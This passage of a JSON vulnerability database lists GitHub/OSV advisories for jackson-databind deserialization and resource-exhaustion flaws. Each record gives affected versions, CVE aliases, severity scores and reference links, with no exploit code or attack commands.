"https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2021-03-18T23:23:27Z", "nvd_published_at": "2021-01-06T23:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-rf6r-2c4q-2vwg", "published": "2020-05-15T18:58:54Z", "modified": "2024-03-15T01:05:13.129194Z", "aliases": [ "CVE-2020-10968" ], "summary": "jackson-databind mishandles the interaction between serialization gadgets and typing", "details": "FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.aoju.bus.proxy.provider.remoting.RmiProvider (aka bus-proxy).", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10.4" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-rf6r-2c4q-2vwg/GHSA-rf6r-2c4q-2vwg.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-10968" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2662" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/05d7e0e13f43e12db6a51726df12c8b4d8040676" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/08fbfacf89a4a4c026a6227a1b470ab7a13e2e88" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200403-0002" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-04-23T19:30:49Z", "nvd_published_at": "2020-03-26T13:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-rfx6-vp9g-rh7v", "published": "2018-10-18T17:42:48Z", "modified": "2024-03-11T05:17:47.425595Z", "aliases": [ "CVE-2017-17485" ], "summary": "jackson-databind vulnerable to remote code execution due to incorrect deserialization and blocklist bypass", "details": "FasterXML jackson-databind through 2.8.10 and 2.9.x through 2.9.3 allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the Spring libraries are available in the classpath.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.4" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-rfx6-vp9g-rh7v/GHSA-rfx6-vp9g-rh7v.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-rfx6-vp9g-rh7v/GHSA-rfx6-vp9g-rh7v.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.7.9.2" } ] } ], "versions": [ "2.0.0", "2.0.0-RC1", "2.0.0-RC2", "2.0.0-RC3", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4", "2.6.7.5", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-rfx6-vp9g-rh7v/GHSA-rfx6-vp9g-rh7v.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-17485" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/1855" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/10fe7f17ea7c8da2a71e7a0c774b420a1d5c1b50" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/2235894210c75f624a3d0cd60bfb0434a20a18bf" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/459107dccc9b3ea991af3e6ad0953e54b01ef7c1" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/4f16f67ebd22c7522fdbb8a7eb87e3026a807d61" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/978798382ceb72229e5036aa1442943933d6d171" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/f031f27a31625d07922bdd090664c69544200a5d" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/eb217dd0f87c5fb471e0668575644aa7eba9a3d3" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/bb45fb16709018842f858f1a6e1118676aaa34bd" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://github.com/irsl/jackson-rce-via-spel" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20180201-0003" }, { "type": "WEB", "url": "https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US\u0026docId=emr_na-hpesbhf03902en_us" }, { "type": "WEB", "url": "https://web.archive.org/web/20200927162225/http://www.securityfocus.com/archive/1/541652/100/0/threaded" }, { "type": "WEB", "url": "https://www.debian.org/security/2018/dsa-4114" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0116" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0342" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0478" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0479" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0480" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0481" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1447" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1448" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1449" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1450" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1451" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2930" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1782" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1797" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3892" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:54:38Z", "nvd_published_at": "2018-01-10T18:29:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-rgv9-q543-rqg4", "published": "2022-10-03T00:00:31Z", "modified": "2024-12-02T16:25:52.858445Z", "aliases": [ "CGA-9vjr-qmvr-wg48", "CVE-2022-42004" ], "related": [ "CGA-3895-m462-85v8", "CGA-53rj-39m2-53xg", "CGA-c8q6-4qp3-vqhh", "CGA-cw73-ccxx-93pc" ], "summary": "Uncontrolled Resource Consumption in FasterXML jackson-databind", "details": "In FasterXML jackson-databind before 2.12.7.1 and in 2.13.x before 2.13.4, resource exhaustion can occur because of a lack of a check in BeanDeserializer._deserializeFromArray to prevent use of deeply nested arrays. This issue can only happen when the `UNWRAP_SINGLE_VALUE_ARRAYS` feature is explicitly enabled.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.12.7.1" } ] } ], "versions": [ "2.0.0", "2.0.0-RC1", "2.0.0-RC2", "2.0.0-RC3", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.10.0", "2.10.0.pr1", "2.10.0.pr2", "2.10.0.pr3", "2.10.1", "2.10.2", "2.10.3", "2.10.4", "2.10.5", "2.10.5.1", "2.11.0", "2.11.0.rc1", "2.11.1", "2.11.2", "2.11.3", "2.11.4", "2.12.0", "2.12.0-rc1", "2.12.0-rc2", "2.12.1", "2.12.2", "2.12.3", "2.12.4", "2.12.5", "2.12.6", "2.12.6.1", "2.12.7", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4", "2.6.7.5", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.10.5", "2.9.10.6", "2.9.10.7", "2.9.10.8", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-rgv9-q543-rqg4/GHSA-rgv9-q543-rqg4.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.13.0" }, { "fixed": "2.13.4" } ] } ], "versions": [ "2.13.0", "2.13.1", "2.13.2", "2.13.2.1", "2.13.2.2", "2.13.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-rgv9-q543-rqg4/GHSA-rgv9-q543-rqg4.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42004" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/3582" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/063183589218fec19a9293ed2f17ec53ea80ba88" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/35de19e7144c4df8ab178b800ba86e80c3d84252" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea" }, { "type": "WEB", "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50490" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00035.html" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202210-21" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20221118-0008" }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5283" } ], "database_specific": { "cwe_ids": [ "CWE-400", "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2022-10-04T21:56:21Z", "nvd_published_at": "2022-10-02T05:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-rpr3-cw39-3pxh", "published": "2022-07-15T19:41:47Z", "modified": "2025-04-14T22:28:33.735201Z", "aliases": [ "CVE-2020-10650" ], "related": [ "CVE-2020-10650" ], "summary": "jackson-databind vulnerable to unsafe deserialization", "details": "The com.fasterxml.jackson.core:jackson-databind library before version 2.9.10.4 is vulnerable to an Unsafe Deserialization vulnerability when handling interactions related to the class `ignite-jta`.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.9.10.4" } ] } ], "versions": [ "2.0.0", "2.0.0-RC1", "2.0.0-RC2", "2.0.0-RC3", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4", "2.6.7.5", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/07/GHSA-rpr3-cw39-3pxh/GHSA-rpr3-cw39-3pxh.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-10650" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2658" }, { "type": "WEB", "url": "https://github.com/luisgarciacheckmarx/LGV_onefile/issues/19" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/pull/2864" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/a424c038ba0c0d65e579e22001dec925902ac0ef" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/04/msg00032.html" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230818-0007" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2022.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2022-07-15T19:41:47Z", "nvd_published_at": "2022-12-26T20:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-v3xw-c963-f5hc", "published": "2020-05-15T18:58:50Z", "modified": "2024-02-16T08:09:27.960507Z", "aliases": [ "CVE-2020-11111" ], "summary": "jackson-databind mishandles the interaction between serialization gadgets and typing", "details": "FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.activemq.* (aka activemq-jms, activemq-core, activemq-pool, and activemq-pool-jms).", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10.4" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-v3xw-c963-f5hc/GHSA-v3xw-c963-f5hc.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11111" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2664" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200403-0002" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-04-23T19:31:18Z", "nvd_published_at": "2020-03-31T05:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-v585-23hc-c647", "published": "2021-11-19T20:13:06Z", "modified": "2024-02-18T05:22:38.024460Z", "aliases": [ "CVE-2020-36186" ], "summary": "Unsafe Deserialization in jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource`.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.9.10.8" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4", "2.6.7.5", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.10.5", "2.9.10.6", "2.9.10.7", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/11/GHSA-v585-23hc-c647/GHSA-v585-23hc-c647.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-36186" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2997" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1" }, { "type": "WEB", "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210205-0005" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2021-03-18T23:16:26Z", "nvd_published_at": "2021-01-06T23:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-vfqx-33qm-g869", "published": "2021-12-09T19:16:59Z", "modified": "2024-02-18T05:24:26.785781Z", "aliases": [ "CVE-2020-36189" ], "summary": "Unsafe Deserialization in jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.9.10.8 an 2.6.7.5 mishandles the interaction between serialization gadgets and typing, related to com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.9.10.8" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.10.5", "2.9.10.6", "2.9.10.7", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", 